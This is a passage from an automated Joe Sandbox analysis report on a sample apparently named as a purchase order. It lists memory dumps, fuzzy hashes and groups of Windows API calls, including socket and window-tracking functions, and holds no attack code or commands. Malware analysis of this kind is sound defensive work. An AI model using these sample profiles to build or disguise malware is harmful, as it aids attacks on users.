                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Proc$Parent
                                                                            • String ID:
                                                                            • API String ID: 2351499541-0
                                                                            • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                            • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                            • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                            • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                            APIs
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                            • TranslateMessage.USER32(?), ref: 00442B01
                                                                            • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Peek$DispatchTranslate
                                                                            • String ID:
                                                                            • API String ID: 1795658109-0
                                                                            • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                            • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                            • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                            • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                              • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                              • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                              • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                            • GetCaretPos.USER32(?), ref: 004743B2
                                                                            • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                            • GetForegroundWindow.USER32 ref: 004743EE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                            • String ID:
                                                                            • API String ID: 2759813231-0
                                                                            • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                            • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                            • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                            • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                            APIs
                                                                              • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                            • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                            • _wcslen.LIBCMT ref: 00449519
                                                                            • _wcslen.LIBCMT ref: 00449526
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend_wcslen$_wcspbrk
                                                                            • String ID:
                                                                            • API String ID: 2886238975-0
                                                                            • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                            • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                            • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                            • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __setmode$DebugOutputString_fprintf
                                                                            • String ID:
                                                                            • API String ID: 1792727568-0
                                                                            • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                            • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                            • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                            • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                            APIs
                                                                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$AttributesLayered
                                                                            • String ID:
                                                                            • API String ID: 2169480361-0
                                                                            • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                            • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                            • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                            • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                            APIs
                                                                              • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                              • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                              • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                            • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                            • String ID: cdecl
                                                                            • API String ID: 3850814276-3896280584
                                                                            • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                            • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                            • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                            • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                            APIs
                                                                              • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                            • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                            • _memmove.LIBCMT ref: 0046D475
                                                                            • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                            • String ID:
                                                                            • API String ID: 2502553879-0
                                                                            • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                            • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                            • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                            • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                            APIs
                                                                            • SendMessageW.USER32 ref: 00448C69
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                            • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                            • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$LongWindow
                                                                            • String ID:
                                                                            • API String ID: 312131281-0
                                                                            • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                            • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                            • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                            • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                            APIs
                                                                            • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                            • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                            • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastacceptselect
                                                                            • String ID:
                                                                            • API String ID: 385091864-0
                                                                            • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                            • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                            • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                            • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                            • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                            • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                            • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                            • GetStockObject.GDI32(00000011), ref: 00430258
                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                            • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateMessageObjectSendShowStock
                                                                            • String ID:
                                                                            • API String ID: 1358664141-0
                                                                            • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                            • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                            • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                            • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                            • String ID:
                                                                            • API String ID: 2880819207-0
                                                                            • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                            • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                            • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                            • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                            • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                            • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                            • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                                            • String ID:
                                                                            • API String ID: 357397906-0
                                                                            • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                            • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                            • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                            • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                            APIs
                                                                            • __wsplitpath.LIBCMT ref: 0043392E
                                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                            • __wsplitpath.LIBCMT ref: 00433950
                                                                            • __wcsicoll.LIBCMT ref: 00433974
                                                                            • __wcsicoll.LIBCMT ref: 0043398A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                            • String ID:
                                                                            • API String ID: 1187119602-0
                                                                            • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                            • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
